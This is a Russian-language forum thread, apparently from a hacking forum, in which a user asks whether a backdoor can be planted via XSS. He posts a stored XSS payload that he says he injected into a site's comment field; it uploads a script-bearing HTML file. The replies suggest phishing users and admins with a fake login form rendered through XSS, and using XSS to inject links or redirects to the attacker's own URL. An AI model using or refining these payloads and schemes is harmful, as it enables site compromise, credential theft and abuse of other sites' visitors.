• XSS.stack #1 – первый литературный журнал от юзеров форума

внедрение файла через xss

anhuldik937

CD-диск
Пользователь
Регистрация
05.02.2025
Сообщения
10
Реакции
0
Можно ли внедрить бекдор через xss вот такой pyload есть
<script>
fetch('/upload', {
method: 'POST',
body: new Blob(["<script>alert('XSS')</script>"], { type: 'text/html' }),
headers: { 'Content-Disposition': 'attachment; filename="xss.html"' }
});
</script> его я внедрил через поле ввода коментария
 
куки воровать 99% не сработает, т.к. они должны быть httponly. А вот придумать разводку, в html отрисовать фальшивую форму логина, и отправлять юзерам\админу, забирая их учетки - да.
 
Мне больше интересны xss где можно оставить анкорную ссылку по возможности с небольшим текстом в 1-2 предложения или вставить редик на свой целевой урл. При таком варианте наши возможности резко расширяются.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх